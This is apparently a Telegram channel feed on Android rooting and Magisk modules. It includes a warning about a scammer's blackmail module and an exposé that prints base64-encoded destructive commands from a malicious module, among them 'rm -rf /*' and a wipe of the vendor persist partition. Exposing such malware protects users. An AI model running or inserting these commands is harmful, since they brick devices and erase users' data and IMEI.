CHAT BETWEEN VICTIM & SCAMMER
๐คฌ225๐ฑ29๐ฟ13๐11๐คฉ9๐ข6๐3๐พ3๐2๐1๐1
This scammer on Telegram [UID 1878505335] is spreading a dangerous Magisk module to hack/destroy phones and demand money. (stoplamers gang)
[See Screenshot 1- CHAT BETWEEN SCAMMER & VICTIM]
What Happened:
โข [UID 7576386418] Victim Ganesh's phone was hacked via Scammer's module.
โข Scammer demanded $100, threatening to destroy the phone if they didn't pay.
โข This guy alerted me to this scam.
โข I went undercover to investigate how it works
[See Screenshot 2- CHAT BETWEEN SCAMMER & Investigator] MUST READ
Here's how it went down:
There were only two things needed: "Zygisk" and the "virus module" (click to read more)
I was really surprised to find out it didn't even require a restart. Once you flashed it, it was basically done.
So I contacted the person and, pretending to be someone else, said I wanted to access my girlfriend's phone. I acted like a nibba & He seemed to believe my story and sent me the module.
To see how it works, I needed to install it. Instead of using the real module, I made two fake modules. I just copied module.prop file from his module, repacked it with my update binary, and flashed it using "kernel su".
The person was then trying to do things to my phone, but nothing was happening.๐ญ ๐คฃ I was just watching it and was really laughing hard because it wasn't working. Then he sent commands to run in the terminal, related to the service.sh file inside his module. Since I hadnโt installed the original module, the commands didn't do anything. He then seemed confused and started asking for my Android and kernel versions๐. Finally, he sent something I wouldnโt run as it was an obvious privacy concern. So, I've decided to just hold on to things for now since I have enough evidence
What Happens If You Flash This Module?:
โข Scammer gets full access to your phone (data, messages, photos, chats etc.)
โข Scammer can steal your data and money.
โข Scammer can lock or destroy your phone. (he remotely destroyed victim's device making it unbootable)
โข You will be blackmailed.
- Moral from this incident๏ปฟ
โข Do not flash modules from unknown sources
โข Only use trusted modules.
โข Be suspicious of free or "too good to be true" modules.
โข Research modules before installing.
Stay safe and share this information with your friends to help stop these scams!
~ Regards // Mona
Please open Telegram to view this post
VIEW IN TELEGRAM
5๐ค304๐93๐ฑ38โค30๐23๐ฟ14โก6๐ฅ6๐4๐4๐
2
Media is too big
VIEW IN TELEGRAM
You can now freeze/unfreeze gms process without rebooting/uninstalling gms updates. More tweaks are added in v4.
Need testers for Power Saver Pro module. Interested users can pm @TempMeow
Need testers for Power Saver Pro module. Interested users can pm @TempMeow
Requirements: Rooted custom ROM
6๐ฅ50๐18๐7๐ซก7๐3โค2๐คฉ2โก1๐1๐
1
zygisk-detach-v1.19.1.zip
170.6 KB
Zygisk Detach is up to date!
Source: https://github.com/j-hc/zygisk-detach/releases/tag/v1.19.1
Module Info-
Stops automatic updates of your installed apps from the Google Play Store. This is particularly useful if you're using Revanced.
Source: https://github.com/j-hc/zygisk-detach/releases/tag/v1.19.1
๐48๐คฉ7โก6โค4๐ฅ4โคโ๐ฅ1๐ฟ1
Ever wondered why some of your famous modules like Play Integrity Fix, LSposed, Shamiko etc. require ZYGISK to work?
KNOW WHAT YOU FLASH, DON'T BE A DUMBASS
Android has this process called the Zygoteโitโs the starting point for all apps. Zygisk sneaks into the Zygote process (where all apps are launched) and injects custom code before the app starts running. This lets it hide root, tweak apps, or even add features, all without the app noticing๐
Zygisk jumps into the Zygote process. Since the Zygote is where apps are created, Zygisk gets to control what happens from the start.
Once itโs hooked in, Zygisk can inject its own code into apps. This is how it:
> Hides root from apps like banking or games.
> Lets modules tweak apps in real-time.
> Makes customization smooth and precise.
Zygisk doesnโt mess with your system files directly. Instead, it works in the appโs runtime, which means any changes are temporary and way safer than old-school rooting hacks.
Modules like LSPosed and Play Integrity Fix, Shamiko etc. arenโt magicโtheyโre just really smart tools that use Zygiskโs ability to sneak into apps and mess with their rules.
๐พ๐ ๐๐ข๐ช ๐๐จ๐ ๐ฃ
What the Heck is Zygisk?
Android has this process called the Zygoteโitโs the starting point for all apps. Zygisk sneaks into the Zygote process (where all apps are launched) and injects custom code before the app starts running. This lets it hide root, tweak apps, or even add features, all without the app noticing
How Zygisk Works
1. Hooks Into the System
Zygisk jumps into the Zygote process. Since the Zygote is where apps are created, Zygisk gets to control what happens from the start.
2. Injects Code
Once itโs hooked in, Zygisk can inject its own code into apps. This is how it:
> Hides root from apps like banking or games.
> Lets modules tweak apps in real-time.
> Makes customization smooth and precise.
3. Keeps it Clean
Zygisk doesnโt mess with your system files directly. Instead, it works in the appโs runtime, which means any changes are temporary and way safer than old-school rooting hacks.
Why Do Modules Need Zygisk?
Modules like LSPosed and Play Integrity Fix, Shamiko etc. arenโt magicโtheyโre just really smart tools that use Zygiskโs ability to sneak into apps and mess with their rules.
At the end of the day, all these powerful modules like PIF, LSPosed etc. are pretty much useless without Zygisk. Itโs the real slim shady that makes everything possible, letting you tweak apps, hide root, and unlock the full potential of your rooted device. Without Zygisk, none of this would be as smooth or even possible.
๐พ๐ ๐๐ข๐ช ๐๐จ๐ ๐ฃ
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ169๐87โค21๐พ7๐ฟ5โก4๐3๐
3๐2๐1
Zygisk Next update detected!
Version: 1.2.6
Author: 5ec1cffโก52๐คฉ12๐5๐ฅ5๐ค5โค2๐2๐ค1
Thanks to this guy for letting us know about this shit
๐70๐ฑ25โก6๐6โค2๐พ2๐ฅ1๐ฟ1
๐จ ALERT: Malicious Magisk Module Exposed! ๐จ
Yโall, I found a dangerous module (zygisk next pro) that can wreck your phone. If youโre into Android modding, beware of this one before it wrecks your device.
This module uses base64 encoding to hide dangerous commands:
This malicious module is hosted on GitHub and spread across various telegram groups.
1. Donโt install random Magisk modules unless you trust the source.
2. Share this post with anyone you know who mods their phone. Letโs stop this scam from spreading.
~ Regards // Mona
Yโall, I found a dangerous module (zygisk next pro) that can wreck your phone. If youโre into Android modding, beware of this one before it wrecks your device.
What Does It Do and How Does It Hide the Damage?
This module uses base64 encoding to hide dangerous commands:
1. Wipes Everything on Your Phone
Encoded Command: cm0gLXJmIC8qCg==
Decoded Command: rm -rf /*
Effect: Deletes everythingโapps, files, systemโturns your phone into a brick.
2. Destroys Critical Hardware Data
Encoded Command: cm0gLXJmIC9tbnQvdmVuZG9yL3BlcnNpc3QvKiAmCg==๏ปฟ
Decoded Command: rm -rf /mnt/vendor/persist/*
Effect: Destroys key data like Wi-Fi settings and IMEI. No Wi-Fi, no calls.
3. Scrambles Your Data Forever
Encoded Command: L2Rldi9ibG9jay9ieS1uYW1lL3VzZXJkYXRhCg==
Decoded Command: /dev/block/by-name/userdata
Effect: Overwrites your data with junk. Photos, videos, filesโgone for good
Where Is It From?
This malicious module is hosted on GitHub and spread across various telegram groups.
What Should You Do?
1. Donโt install random Magisk modules unless you trust the source.
2. Share this post with anyone you know who mods their phone. Letโs stop this scam from spreading.
~ Regards // Mona
๐185๐ฑ46๐ซก16๐ค9๐6๐4โค2
These scams and malicious modules will keep coming, constantly changing their tactics.
The only way to stop them is to understand your phone is more valuable than any customization or module. Stop flashing modules from untrusted sources or those you donโt fully trust. Your phoneโs security comes first.
The only way to stop them is to understand your phone is more valuable than any customization or module. Stop flashing modules from untrusted sources or those you donโt fully trust. Your phoneโs security comes first.
Edit: The malicious modules have been taken down from GitHub. Thank y'all for reporting. Keep in mind, the zip still exists and has been circulated in various Telegram channels.
๐ฏ172๐28๐12๐ซก8โก6๐ฅ6๐พ5โค2
v4 | By ๐ ๐๐ข๐ช๐ป๐ฎ
Downloadโฌ๏ธ | Support Group๐
โก๏ธModule Info-
โข Disables 200+ unnecessary GMS process
โข Kills log process
โข Cleans cache & useless files
โข Optimize storage & performance
โก๏ธNOTES
- This module is made for CUSTOM ROMs (AOSP) only. Flashing it on stock/GSI/port etc. ROMs is prohibited and it may cause problem. Module author won't be responsible for your mistake.
- Use action button to clean trash & Enable/Disable GMS features (no need to reboot)
- Remove all installed modules & tweaks related to performance/CPU/Gaming before flashing this module
- Tested On: GenesisOs A13, VoltageOs A13-14, ArrowOs A13, LineageOs A13-14-15, RisingOs A15, Crdroid A13-14-15, HavocOs A10, Nameless CLO A15
Credits: Thanks to @ShastikXD for helping & all testers for testing.
Some codes in this modules from (v4.) belongs to https://github.com/tytydraco/KTweak , which was added by sastik (a friend of mine) which he forgot to give credits) and I didn't knew it was picked from someone's code, we don't steal someone's credit but free free to use our without giving us any credit, my approach is to provide useful stuff to users without any convince.
- Users currently on versions v1, v2, or v3 must perform a fresh installation
- Magisk / KernelSU / APatch supported
- The action button controls GMS processes, with a popup confirming changes. If the popup fails to appear, a manual APK update is required.
This script is provided as a compatibility solution for users of older Magisk/KSU/Apatch versions where the action button integration may have issues.
Please open Telegram to view this post
VIEW IN TELEGRAM
12โก50๐27๐ฅ9โค5๐คฉ3๐
3๐2
PowerSaverPro๐v4.zip
100.9 KB
This module is made for CUSTOM ROMs only. Donโt flash it on stock, GSI, ported or other ROMs as it may cause problem.Consider reading this for better understanding
1๐ฟ42๐ฅ18๐16๐พ4๐3โค2๐2๐1
PowerSaverPro๐v4.1.zip
101.4 KB
Changelog
v4.1๐ค Added Volume Key selector to switch between agressive & safe mode
๐ช Installing the PowerSaver companion along with module
๐งช Improved codes and functions.
๐ Removed hashes files after
installation
๐ค Can be dirty flashed over v4 only.
[MODULE INFO]
2๐90โก16๐12โค8๐3๐
3๐ฟ3๐ฅ2๐คฉ2๐1
https://telegra.ph/The-Custom-ROM-Flashing-Addiction-More-Than-Just-a-Hobby-01-11
Are you a flash-holic too?
Telegraph
The Custom ROM Flashing Addiction: More Than Just a Hobby?
Letโs explore a growing craze sweeping through the Android communityโan addiction that doesnโt come with warnings, but slowly starts to take over your attention: Custom ROM flashing. Itโs a slippery slope, my friend. A just one more ROM mentality thatโs somehowโฆ
๐ฅ177๐ฟ46โค22๐20๐ฑ12๐11๐ฏ9๐8๐ค6โก3๐2
๐ ๐๐ข๐ช ๐๐จ๐ ๐ฃ pinned ยซhttps://telegra.ph/The-Custom-ROM-Flashing-Addiction-More-Than-Just-a-Hobby-01-11 Are you a flash-holic too?ยป
Pixel Weather Module v1 [A15].zip
4.4 MB
Pixel Weather
(for Android 15 Only)
Magisk / KSU / Apatch supported
[PREVIEW]
๐24๐ค6๐คฉ5๐4๐ฟ4๐
3๐ฅ2๐พ2๐2โค1๐1
Strong Integrity: How to Check It Without Burning Out Your Keybox
If you need strong integrity, you probably already know how to get it. But hereโs a tip: donโt waste your time on third-party apps like SPIC, YASNAC etc or keybox checker bots, using the Play Integrity API. Oh, and constant poking around in the Play Storeโs developer options? Not a good idea either.
The Smarter Way to Check
Hide ROOT & Install an app that requires strong integrity to function.[try to login INGRESS PRIME] (enable GPS too). If it works, youโre all set. If it doesnโt, thatโs the only time you should consider using the Play Storeโs developer options to check your integrity status.
Why This Matters
Every time you make a Play Integrity API request, youโre chipping away at your keyboxโs lifespan. Think of it like a rechargeable batteryโyou donโt want to drain it unnecessarily. Too many checks, and youโre left with a dead keybox. And to make things worse, no one really knows what Googleโs up to behind the scenes.
Check only when needed, and save your keybox.
1๐ฅ61๐ซก34๐22๐ฟ8๐3โค2๐ฑ2
What do you use ROOT for?
Anonymous Poll
49%
Play Integrity / Backup-Restore
46%
Revanced / Ad Blocking
33%
GPhotos Storage / Call Recording
36%
UI Customisation (appearance)
48%
Debloating / Performance Tweaking
17%
Other (not mentioned)
5%
I don't root
๐63๐ฅ30๐คฉ8๐7๐4๐พ3๐ค2โค1
Choose your choice, I'll try to make content based on this survey
Anonymous Poll
8%
I'm using custom ROM without root
61%
I'm using custom ROM with root
24%
I'm using stock ROM with root
7%
I'm using stock ROM without root
101๐72๐21๐คฉ15๐12๐9๐5โก4โ4๐พ4๐ฟ3๐
2